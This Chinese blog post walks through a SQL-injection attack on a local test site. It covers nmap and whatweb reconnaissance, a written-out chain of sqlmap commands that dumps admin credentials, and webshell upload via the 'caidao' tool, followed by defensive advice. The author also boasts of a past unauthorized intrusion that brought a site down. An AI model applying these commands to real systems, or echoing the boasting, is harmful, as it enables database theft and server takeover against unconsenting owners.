美文网首页
太天真了|web渗透轻轻松松搞疯你

太天真了|web渗透轻轻松松搞疯你

作者: 工程师江湖 | 来源:发表于2019-08-01 12:01 被阅读0次

    ​其实啊,你的网络这么差劲!

    (备注:大神如果想喷请通过私人微信,可接受冲击波攻击)

    仅使用本地测试,非网络攻击行为。

    本文关键字:安全,网络,kali,sqlmap

    出自公众号:工程师江湖

    入侵你的网站,与你何干,仅仅只是好玩罢了!

    (改编自—刘慈欣语录)

    仔细听.........有人潜伏在你的背后!

    一、简单聊聊?

    你是不是想问,我有必要关注安全吗?

    你不关注,那某些人就很开心了!

    你们的数据我随便跑,简单到什么地步呢?

    一套kali工具就可以让你欲仙欲死,抱歉,说错了,是,让你痛不欲生!(不小心就给你网站玩死了,你的业务呵呵哒。。。)

    这种情况很有可能只是菜鸟很平常的行为,高级点的很少会玩坏你的网站,他只会获取你网站的权限,进而拿下你的这台服务器,再牛逼的,通过这台服务器辐射到你的内网,后果自己想去。

    什么,你说你不信?等着,给你简单说说——到底怎么个简单法!

    谷歌浏览器,利用关键字就可以搜索到一片存在注入漏洞的网站,如果你的网站很不幸被检索到,那么.......

    针对这个网站搜集信息,手段么,kali自带的n多小工具,插播一句,

    kali,你值得拥有!

    nmap扫描啊,我擦,这么多开放端口;

    whatweb,我擦,服务器的类型是这样子的啊,网站是这种的啊,语言是这种啊(脑袋里面转过一圈针对这种类型的攻破技巧)。。

    作为小菜鸡的我居然感到无聊了.......这么简单!!!!

    我对着网站一顿点点点,通过简单的手工测试找到貌似可执行的注入点,然后sqlmap一顿搞,ok你的管理员账号/密码到手,抱歉说错了,是你的数据库到手,里面的信息,哇....好多啊,神奇的是居然管理员的QQ号都有。。。

    “你又不知道我的后台页面”,这个真的是不要太简单啊!

    一个类似御剑扫描小软件就可以简简单单把你的后台跑出来,唯一复杂的操作就是需要复制,粘贴你的域名。

    好了,现在使用账号密码填入你的后台页面,真是一览无遗。

    ok,现在终于提起点精神了,想办法上传带有木马的图片等,再拿我可爱的菜刀软件,咔的连接上去,这种感觉.......

    都说光说不练假把式。那好,我本地搭建环境走一遍。

    (公网是万万不会的,请默念三遍 小编是菜鸡,是鸡菜,菜鸡.....)

    走一遍

    1.配置环境

    (1)准备说明

    phpstudy+带有漏洞的网站+kali工具一套+跑后台软件

    (2)网站账户名密码简单设置(证明后期操作结果)

    admin/admin

    (3)网站架设成功

    2.开始搞

    (1)搜集信息

    端口信息

    服务器信息

    后台信息

    (2)注入点查找

    野蛮点击,看见id进行1=1和1=2测试,不一致直接扔到kali,利用命令sqlmap -u test.com --dbs 读数据库,结果当然失败,因为那个链接不存在注入,继续找,想了想,还是上工具吧。

    (3)直接扔到sqlmap进行跑

    这里进行个总体说明。

    // 说明:这里写相关的sqlmap命令行入侵等内容(1)使用sqlmap注入检查命令进行验证sqlmap -u "http://www.test.com/?r=content&cid=15"  (2)获取当前数据库名称

    sqlmap -u http://www.test.com/?r=content&cid=15 –-current-db(3)获取当前数据库用户

    sqlmap -u http://www.test.com/?r=content&cid=15 --current-user(4)获取数据库所有表

    sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms --tables(5)查看表中的字段

    sqlmap -u http://www.test.com/?r=content&cid=15 –D seacms -T manage -- column(6)导出字段的值

    sqlmap -u  -D "seacms" -T manage -C user,password --dump(7)最后将密文解密,就得到了管理员密码

    具体内容截图

    得到数据库名称

    数据库所有表

    经过脚指头分析,manager表里面很大可能有管理员账户和密码,接下来我们跑它。

    看见没有,这几个字段里面必定有信息,接下来只跑user和password字段值。

    现在账户密码有了,再把密文解密下。

    可以登录后台并且上传木马了。。。。

    菜刀来一把——

    来看看权限,不得不说一句,菜刀牛皮.......

    二、怎么样会变安全?

    洗洗睡吧!其实怎么样都是不安全的,只能一定程度上变得安全,刷掉一批初级菜鸟,对于牛逼的高手来说,无非是从几分钟攻破变为几天,几周而已。。。!

    心里是不是MMP。。。

    放心啦!情况没有这么糟糕的。

    你相不相信我说的这句话,我不知道,我知道,我说这句话是用来安慰你的。

    不过有句话我是认真的,一定程度上确实可以变得安全。

    给你上个网络拓扑图(画了我半天)

    看见没有,防火墙,IPS,漏扫等这些,看见的麻烦问下自己,自己有这些防护吗?

    回答1:有。ok,你可以放点心了,对,就是放点心,你这个防护,已经可以阻拦掉一大批走在安全道路上的小菜鸟了。

    回答2:没有。那我只能说句,你们家已经成为后花园了,我闲着没事逛逛,我无聊时候逛逛,我心情不好,给你网站传个东西。(某天你访问网站就会抓狂)

    这还算好的了,网站还是可以运行,但是,遇到下手要是没有分寸的,你的网站就挂掉了。

    问:你在吓我吧?

    我绝不会告诉你,当我是菜鸡的时候就是这样搞的。(不要误会,现在依然是菜鸡,不过那种行为N年没做了,未经授权,即为非法)

    当时真的是抱着无所谓的心态玩的。

    后来,他家的网站关闭,再后来进不去了,也算提醒了他们。(暗暗自喜)

    三、我要绝对的安全

    别幼稚了,哪里有绝对的安全!

    网站代码总会存在漏洞的。

    硬件设备总会产生这样或者那样的问题。

    管理人员总会因为意识不到位,导致产生安全事件。

    你只能退而求其次,一定限度的去保障自己网络的安全,从而保护自己的资产安全。

    怎么个限度法?

    1、增加安全设备(我直说了,你花钱把)

    安全厂商有哪些呢?

    列举些:天融信,启明星辰,山石网科,深信服等......

    2、设备,系统入手

    你说什么?还要安全意识。

    设备???系统???

    没错,等我喝口水慢慢说。

    曾经为企业上门,看到了很搞笑的一种状况,电脑屏幕上面贴着账户和密码,当时惊为天人,但是我不说!

    曾经为企业上门调试设备,又看到了搞笑的一种状况,数通等设备的登录名和密码是厂家默认的,基本的设备防护功能也没有开启,类似dhcp snooping这种,当时感叹人生,但是我不说!

    曾经也是调试过系统,还是那句话,很搞笑,系统的一些基本防护措施依然没有,又是一阵感慨,但是我还是不说!

    (抱歉,上面三句是为了凑个押韵强行写的。)

    然而,为了写这篇文章,我一定要说两句

    “兄弟姐妹们,上点心吧!”

    可以从简单的做起,网络结构要注意进行分层次,管理网络一套,业务网络一套。

    网络里面应该部署的安全防护设备,请,不要吝啬!

    因为今天你的省钱行为会导致后期的数据损失。(如果钱比你企业的数据重要,那么当我没说)

    设备,系统等密码一定要数字,大小写交替,长度一定要够,另外的密码需要加密,否则内网环境下。一个ettercap等类似工具就可以抓取到你的传输密码信息。

    类似系统防护一定要在配置文件里面顺手做了,参考这篇:Linux安全配置规范(https://mp.weixin.qq.com/s/BSdVm08YgWxh5BDUv7LXxw)

    其余的具体防护,本篇不在多说,下篇再会。(备注:看心情更新,关注人不多就懒得写了)

    你是不是想说,看起来好麻烦啊!

    也有解决办法的,找专门的安全服务公司进行评估,最后出一个完整的防护方案。

    题外话:(为了收集素材,捡起了很久没用的渗透知识,然后结合网络简单的写了一篇,欢迎与我沟通,交流你的想法!)

    备注:每邀请本行业5人入群,可免费获取已经部署好的渗透环境进行学习。

    最后

    依然是有任何问题,欢迎入群交流。(转载请获取授权!)

    ————  e n d ————

    觉得文章不错的,欢迎点在看转发,长按下图关注公众号 工程师江湖,收看更多精彩。

    今日问题:你想象中的安全,是什么欢迎留言

    相关文章

      网友评论

          本文标题:太天真了|web渗透轻轻松松搞疯你

          本文链接:https://www.haomeiwen.com/subject/jkdqdctx.html